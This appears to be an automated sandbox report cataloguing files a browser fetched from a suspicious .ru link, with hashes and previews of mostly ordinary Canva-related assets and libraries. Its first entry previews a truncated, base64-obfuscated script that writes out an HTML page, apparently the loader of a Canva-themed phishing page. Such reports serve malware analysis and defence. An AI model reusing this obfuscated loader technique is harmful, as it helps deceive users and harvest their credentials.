                                                                                                                                                                                                                                                    URL:https://58ts.vomlogsffy.ru/z9yaFIg/
                                                                                                                                                                                                                                                    Preview:<script>../* Don&#039;t watch the clock; do what it does. Keep going. */..if(atob("aHR0cHM6Ly81OFRzLnZvbWxvZ3NmZnkucnUvejl5YUZJZy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICA
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):354
                                                                                                                                                                                                                                                    Entropy (8bit):5.6762578005096325
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:YkHKKF7r48evSQNWKtI3s0ud9lbpYhF81ExPA6WrGbfm4XCE2p64phvxg7h+7uH1:YkqmXnwScWKwwlF+F81ExPA3Cmamp62S
                                                                                                                                                                                                                                                    MD5:B4F9F0DD587C5ABE6708F44A6E11A53F
                                                                                                                                                                                                                                                    SHA1:28EBFA68F92AE2A96354521FFAD38A3DBE647154
                                                                                                                                                                                                                                                    SHA-256:CCC37C837397D66FD8E0FACFE001CE7FC9F87E48089D73540AD2C2DD95716D04
                                                                                                                                                                                                                                                    SHA-512:D471D889D8EAE3E9190B39376C29400D5AB9BF3C47897B64DC278E4E58314A78F148A44BB315D51591CA5384EAE505AD411BEF7AA706FDD5678023109A809425
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://cdn.metadata.io/pixel/config/1721.json
                                                                                                                                                                                                                                                    Preview:{"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNrYWdlIjoiRlVMTF9GVU5DVElPTkFMSVRZIiwiaXNfcGxnIjoiMCJ9.wMldEMSftyWmTu8VELd7xI0gDpqzWR64-SlbjetKBO8"}.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):116426
                                                                                                                                                                                                                                                    Entropy (8bit):5.7208453860086435
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:XkbvqdkaiAiNBJ3xaanqYjO7yghQkPhMjA:QDAitxaanqYwyCF
                                                                                                                                                                                                                                                    MD5:EABA8CC237C899055F4BF25E96192406
                                                                                                                                                                                                                                                    SHA1:EC5E1008B0B4D77DC2E026FB74B5147BECC75679
                                                                                                                                                                                                                                                    SHA-256:89117D4A64609615AB893C78A747B785BBBF99FDEE2AFB00AC4F2998662051F2
                                                                                                                                                                                                                                                    SHA-512:5D9A6CFC10BD6D6DBB037473D336E1CE71564386D30D476C7D8A74D929A08BE8E073995C61745182863BF128AC573C7DBFE0C48298F108233C876C0FE08461F6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/19jbs9.2447b447994aff36.ltr.css
                                                                                                                                                                                                                                                    Preview:._94P4tA{outline:none}.theme{color-scheme:var(--4h-m_A)}.light{--4h-m_A:light;--Zpa-KA:#00c4cc;--eGVbng:#8b3dff;--M5_pvA:#7731d8;--boKKWg:#612dae;--oqurdw:rgba(64,87,109,.07);--d1p99w:#fff;--17LfHw:rgba(36,49,61,.4);--EgWgfg:rgba(13,18,22,0);--X3--Zg:rgba(64,87,109,.07);--xfy86Q:rgba(57,76,96,.15);--p53f_Q:rgba(13,18,22,0);--REcY5g:#0d1216;--XajtPQ:rgba(36,49,61,.4);--FVk7Ew:rgba(165,112,255,.15);--2-zmYA:rgba(165,112,255,.15);--ySYdsQ:rgba(165,112,255,.2);--aMXh3A:rgba(64,87,109,.07);--_RN1Dg:#612dae;--8fGzbw:rgba(36,49,61,.4);--ob8tTA:rgba(13,18,22,0);--MghLXQ:rgba(64,87,109,.07);--3R4u8w:rgba(57,76,96,.15);--TwiLcg:rgba(13,18,22,0);--QeQ0Dw:#0d1216;--TZOI7A:rgba(36,49,61,.4);--SZMkXA:rgba(165,112,255,.15);--1zesEA:rgba(165,112,255,.15);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:rgba(64,87,109,.07);--8Ex5gA:#612dae;--spIP2A:rgba(36,49,61,.4);--KtXlRg:rgba(17,23,29,.6);--QADODw:rgba(13,18,22,.7);--kTBxcw:rgba(13,18,22,.86);--HxK_kw:rgba(17,23,29,.6);--6u-yJQ:#fff;--J0YKvA:hsla(0,0%,100%,.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55289)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):55418
                                                                                                                                                                                                                                                    Entropy (8bit):5.2011745666689
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:7Snb/BBuuGki0usgH8bdwB005NLqrbcSb4sA7CctFzBmBv4L7HelSWVoz8WlqdLZ:70q8berM2bW6X49yWx1ZSDh/33s
                                                                                                                                                                                                                                                    MD5:16E5D529039D25735AE0BA1D610125E8
                                                                                                                                                                                                                                                    SHA1:D7CAA746424A018583EC1E097F74A484C4FB1811
                                                                                                                                                                                                                                                    SHA-256:C6DE703F8EE214808496DCD92795AC8971782935ED75ABDD5624C814E69DAAEA
                                                                                                                                                                                                                                                    SHA-512:56AC6CDABC05070E1440C8CA4A60119B3555B2743BA8652A2A0282701ECC8E150AC343020D620D3F5CD6406F04966CDE54FD797530149AD0B2711E44F89165D0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/static/lib/sentry/7.16.0.min.js
                                                                                                                                                                                                                                                    Preview:/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(t,n,e){const r
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):19948
                                                                                                                                                                                                                                                    Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                    MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                    SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                    SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                    SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):115121
                                                                                                                                                                                                                                                    Entropy (8bit):5.371362815606401
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:tX/OXPeGcbWUc/0aHscJYoJyhVVh5XGsj56pY5TS2z5frSiqdE:tX/sPbcbWUXaHscGoIhVVHXGqSK5frf/
                                                                                                                                                                                                                                                    MD5:CB1826AF86C8190CEB1FF4F70E255C6D
                                                                                                                                                                                                                                                    SHA1:83057F32ACAA0D277001D22AEAEC60D141281C3E
                                                                                                                                                                                                                                                    SHA-256:34E60C5656534222F02FC99959F0B48D191CE8A6CF8CC78DCFDA19A794FAED9F
                                                                                                                                                                                                                                                    SHA-512:BA5F119FD4C74B74E310A3EB6451B117F564634208B9D20259D554A3D8749E17ACC39D3DBD2B82DEC7426ADFE4ED61EA24919B9ECEB6EF06BF837491A180D9DB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.length);for(let n=0;n<i.length;++n)s[n]=i.charCodeAt(n);return s}}},576196:(t,e,i)=>{i.d(e,{G:()=>s});const s={CustomEvent:"ce",Pr:"p",_u:"pc",vc:"ca",Ea:"i",qs:"ie",M:"cci",R:"ccic",I:"ccc",F:"ccd",ql:"ss",xl:"se",Oi:"si",Ei:"sc",Gi:"sbc",Cc:"sfe",mo:"iec",Uu:"lr",zu:"uae",O:"ci",$:"cc",Ju:"lcaa",Eu:"lcar",On:"inc",Ln:"add",Rn:"rem",$n:"set",Bn:"ncam",Ku:"sgu",Fr:"ffi"}},876055:(t,e,i)=>{i.d(e,{Z:()=>s});const s={W:function(){const t=(t=!1)=>{const e=(Math.random().toString(16)+"000000000").substr(2,8);return t?"-"+e.substr(0,4)+"-"+e.substr(4,4):e};return t()+t(!0)+t(!0)+t()}}},19601:(t,e,i)=>{i.d(e,{Z:()=>s});class s{constructor(t,e){this.database=t,this.vd=e,this.parent="undefined"==typeof window?self:window,this.database=t,this.vd=
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (961)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4342
                                                                                                                                                                                                                                                    Entropy (8bit):5.6517263885160025
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:/8TJjT0vw3F8mBC7bGxsRgTs1aiq65uYf47AuMA2y:/8TJcvEF3C2xsRx1aifPi2y
                                                                                                                                                                                                                                                    MD5:09B8A90F25C53311A2C0D17023A001B7
                                                                                                                                                                                                                                                    SHA1:7D8078C095461AE252E46C5D7ECF57BF2CD1366A
                                                                                                                                                                                                                                                    SHA-256:8441A93D7CE291E8F9D976B81EDC975A327ADC21F7A1FA6384A293A6DF086B9D
                                                                                                                                                                                                                                                    SHA-512:389B39591B6663900D6C6236CE651E64AB0585C9FF095CD6071B3966B450FA256ADF5FC7C6601E09C2B4829C7089A06AE6AEDA4D467DF846AFFFE787049D1204
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5769],{../***/ 732219:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(653425);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var Ga=__c.Ga;.var Bqb=function(a,b,c,d){const e=async f=>{var g;if(null===(g=b.wq)||void 0===g?0:g.id)clearTimeout(b.wq.id),b.wq=void 0;d.Ph("handle_scheduled_view_duration");return zqb(a,b,{...f,lq:c,ad:d})};return{CJa:e,DJa:async()=>{if(0===b.state.type){var f=await e(b.state);if(!f.ok)switch(f.error){case "RECORD_HEARTBEAT_ERROR":case "ABOVE_IDLE_THRESHOLD":case "SUSPECTED_SLEEP":case "INVALID_INTERACTION_TIMESTAMP":return a.T4(b);case "LESS_THAN_MINIMUM_DURATION_THRESHOLD":return 0!==b.state.type?void 0:H3(a,.b);default:throw new __c.B(f.error);}0===b.state.type&&(f.value.qLa?Aqb(a,b):H3(a,b))}}}},H3=function(a,b){__c
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):317784
                                                                                                                                                                                                                                                    Entropy (8bit):5.584453307396525
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:n44WYnsmQ88YZ1HcRCrKkEZMf3/mrfH6uT+bsDX:44Sm98Y7Hc82UQX
                                                                                                                                                                                                                                                    MD5:423F3996A1657947E7396EA4516FAA1F
                                                                                                                                                                                                                                                    SHA1:57E667FD26CBEFB4465919400C8637E0B22C37CF
                                                                                                                                                                                                                                                    SHA-256:4850B4BCD1297EB49EA83F62D4C88F0FC595D2455BF4361BDBFE8238A529F808
                                                                                                                                                                                                                                                    SHA-512:2526C19D94BF4715AE4112D18AA46F7AC3111300B8ADDCBE18A39B5645DC62F423A5BD37B9FA579ED3625C2F3160603137CF443C702888127E7756D6276899E5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":12,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_manualEmailEnabled":false,"vtp_cityValue":"","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneValue":"","vtp_autoPhoneEnabled":false,"vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":107},{"function":"__ccd_ga_first","priority":11,"vtp_instanceDestinationId":"G-EPWEMH6717","tag_id":120},{"function":"__set_product_settings"
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 42500, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):42500
                                                                                                                                                                                                                                                    Entropy (8bit):7.995484886475068
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:wsHVYoZfdNG2XlJeVdjICnsokinVFsRPvNC557ogFY491OibT2ZFn0Fl:XY61NG2XlUIZozHsRXNc7ocR910FKl
                                                                                                                                                                                                                                                    MD5:35A11F6A81A4FC01BA1480668513D5EF
                                                                                                                                                                                                                                                    SHA1:4A7D1F90180D7E2649FE5FA43D03C374285ECBB0
                                                                                                                                                                                                                                                    SHA-256:6394ED8F516A766A09242489BED086DA0ABEC3B608A02104E662ABDB026C9D67
                                                                                                                                                                                                                                                    SHA-512:649351D13701BC4505A3C2511AD6845A52054E7531DF4AEFFEB010885F0167438CB837FF144B09C45A8C76DD96A61CE3B382E09E04785C8F5E525FE0B244D849
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-RegularItalic16711881996774813.8dbae49e1280328b442be6dfff163124.woff2
                                                                                                                                                                                                                                                    Preview:wOF2..............................................D..J..l.`..n...........D..T..>..6.$..:. ..Y..{..K[....U....0.T.....?.[9...ns..t.b..p~..T".....@..-.......{.J.Y....@...U.....Ie.w1.UD0.9.........]:.wj....E..n......G.1|*....(].R...SV@.N...^L........b.*$..M|5..Q(....m..,Y.*.^sV... .c.!^W.^...T.*..y...)T.t.0._.Y-hT/.2q..K...8._..:.>...`E4~.2!.1K.J.dDW.."X.Y.j.3..7....gS~.....p..U..M...z..RF&..9h.?&..wV.]...Ug.&.z.c.....,.on9h.9.....|...\.... k.....gW....nWP.x*............x..q9.7..{......~U......D.....I.<.Z@.Uu.ld.X...X.]p..Q..Y.D3...c..w.)#....).L..!d..C.v..].qw..>....$.(Qd.2V.$d..y.g.s.s.6....n.......(.D.......<.zf.J....,.[...Z....3.v.Z."%Si<.X(Z..G..v..:..WL1.Y.q.G....}[K ..R._...@...z...f.p>`.A].aW,...tq&.~...z.....}b... .(#.?.....I...M...z......C.,...^..........EB...W.;l.>.~-}.yw...)..D.T....6U..:...c.t...l...@..s.zs.k?.....?...c2....D$..h....X.J.w.0....7..j..6...V....b.-....K....t. 8T..e.O[......O.....aC..#..%..j...=.5.|.U...|..`...]wO...`....L+..r..s..
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format, CFF, length 1136, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):1136
                                                                                                                                                                                                                                                    Entropy (8bit):6.9205301634912555
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:V6x4rfIXZe5PuRlil3RV+cccUUUiQ8H/WTSKo//vSUw8PtIp/U:VaUIZW2KhAcclNirWml//K+tr
                                                                                                                                                                                                                                                    MD5:B46630E470F4040EBA7033CF2435EDCE
                                                                                                                                                                                                                                                    SHA1:BA26D2E1DC5BBC01A80446AC65BFFB991953764A
                                                                                                                                                                                                                                                    SHA-256:3E32AEA52247A81C38B4735E84A28BA27B0CBC33F007A1D14E81E64BA766EADD
                                                                                                                                                                                                                                                    SHA-512:EFF809CC87517F9048F1C7A16561EF6F956ED0FE50B3382AFAF111B6F159E769DD88AF0DC0D8A03B748D407C5C554789B6148A137AC700F776A260FD153C0AE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/b46630e470f4040eba7033cf2435edce.woff
                                                                                                                                                                                                                                                    Preview:wOFFOTTO...p.......,........................CFF ..............&.FFTM...(...........GDEF.............'..OS/2.......G...`X.b.cmap.......7...B....head...0...3...6...hhea...d.......$...ohmtx... .........H.Hmaxp..............P.name.............r.post........... ...3vhea...D..."...$...$vmtx...h............x.c`d``.b.D&.x~...../.".7W.I..%..b...z....L Q..J.V.x.c`d``V`8.......z...P...5..!.....P.....x.c`fX.8.......i...C..f|.`....e`.d..F.$...........p.......q.P....*q...x...1n.0.E..'..".U.:..9...1Cv......(..z...B.%W....!..>.....<....'S6(.Q...Zy...+..|)/..Ey...4y..3.<.f.8.Yy.W4.95..KX|+.X.&.7x..pD$M.,..;F?...[....c..s..;...N1R.h.PA..|..s..\.d.~BC.q.vcl.u....Nv.lJ'uso.....i/K..^....!..q."u%".....Ai...x.c```f.`..F.......|... ... .........J.F6...|@.....}....x.c`f.....F@......(U....x.E.!O.@.G...\.rl....,$$H._...m2.,. d......s.L".T v.`f..o.[;...S.G...Qt...n.........N.I...(x..\p...U.V;.....%......1...A....[:...{......X.T,...5.."qY(..u.Z.(.kU...c..T.Qn.2F..'&>.U(Ff+7i.O.<<[....*g.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://sb.scorecardresearch.com/p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260
                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 40708, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):40708
                                                                                                                                                                                                                                                    Entropy (8bit):7.994832654854839
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:Ai5GA2KblnJ80SVBPE/JDSHwih/OOcWE5DBEjufzqyH1pbYi8FzeMIX3oS7Kwx+:Ai4AHnXSVBPEkwih5cJ5DBaizhHPbYiO
                                                                                                                                                                                                                                                    MD5:FFE7CC3945DCFF0497DF9901158CA5C9
                                                                                                                                                                                                                                                    SHA1:92B86140E39DC5B0EBAAF91AC3147F7ED7379851
                                                                                                                                                                                                                                                    SHA-256:C856336C2C3439EF8A736B40A7B11A7E575979A739C96EDF7BAED2D1A5B131D8
                                                                                                                                                                                                                                                    SHA-512:46C4AB2ACAC2269DCCB459A04DBB5C959331ECAEC9D75F79249909E9C6C1C2CB3EF1FF550CC5AB48C56E445FA84D4358789EFDDC94786CB8349D90BD79CE24D2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-Regular15263162195051178836.f4.f4a4890561b3fddfd1fd9a1b27b6d4a4.woff2
